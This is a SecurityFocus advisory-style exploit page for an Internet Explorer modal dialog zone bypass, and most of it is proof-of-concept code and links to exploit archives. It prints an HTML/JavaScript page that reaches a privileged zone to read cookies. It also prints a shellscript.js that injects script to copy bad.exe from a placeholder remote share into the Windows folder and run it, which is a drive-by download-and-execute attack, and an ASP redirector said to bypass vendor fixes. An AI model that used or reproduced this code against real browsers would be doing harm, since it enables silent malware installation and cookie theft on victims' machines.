Microsoft Internet Explorer Modal Dialog Zone Bypass Vulnerability

An ASP version of this exploit is available at the following location:
http://ferruh.mavituna.com/article/?553

An updated version of the Jelmer exploit implemented in ASPX (The-Insider.zip) has been published by Rafel Ivgi. Further details in regards to this exploit can be found in the associated discussion reference.

An updated version of the Jelmer exploit implemented in PHP (dir.zip) has been published by Liu Die Yu. The payload.exe executable has been removed from the exploit archive. Further details in regards to this exploit can be found in the associated discussion reference.

There are reports of exploits circulating in the wild that employ this issue and BID 10472.

A proof-of-concept has been published at the following location:

http://62.131.86.111/security/idiots/repro/installer.htm

An additional proof of concept is also available:
Exploit page:
<HTML>
<SCRIPT>
//liudieyuinchina AT yahoo DzeroT com DzeroT cn
//ALL IE SECURITY MESSAGES!!!!!! always up2hour at http://iebug.com
//http://umbrella.name/
//message: davinci is still alive

location.href = "http://www.google.com/";
showModalDialog("md.htm",window).location = "JAVASCRIPT:alert(document.cookie)";
</SCRIPT>
</HTML>

md.htm contains:
<HTML>
Close this dialog when google is loaded in the main window.

<SCRIPT>
//liudieyuinchina AT yahoo DzeroT com DzeroT cn
//ALL IE SECURITY MESSAGES!!!!!! always up2hour at http://iebug.com
//http://umbrella.name/
//message: davinci is still alive

window.returnValue = window.dialogArguments;
</SCRIPT>
</HTML>

An additional proof of concept exploit supplied by, Ferruh Mavituna, that is reported to bypass vendor fixes is available:
New shellscript.js
=====================================================
function injectIt() {

document.frames[0].document.body.insertAdjacentHTML('afterBegin','injected<s
cript language="JScript" DEFER> var
rF="\\\\\\\\IPADDRESS\\\\NULLSHAREDFOLDER\\\\bad.exe"; var
wF="%windir%\\\\_tmp.exe"; var o=new ActiveXObject("wscript.shell"); var
e="%comspec% /c copy "+rF+" "+wF; var
err=o.Run(e,0,true);if(err==0)o.Run(wF,0,false);</script>');
}
document.write('<iframe src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>');
setTimeout("injectIt()", 1000);
=====================================================

Also for testing in IIS Servers; ASP equivalent of redir.jsp

redir.asp
=====================================================
<%
Response.Expires = 1
Response.Expiresabsolute = Now() - 1
Response.AddHeader "pragma","no-cache"
Response.AddHeader "cache-control","private"
Response.CacheControl = "no-cache"
For x = 1 to 500000 'Time
z = z + 10
Next

Response.Status = "302 Found"
Response.AddHeader "Content-Length", "4"
Response.AddHeader "Location","URL:res://shdoclc.dll/HTTP_501.htm"
%>
=====================================================

These files are available at:
http://ferruh.mavituna.com/exploits/fm_ieshell.zip


 

Privacy Statement
Copyright 2010, SecurityFocus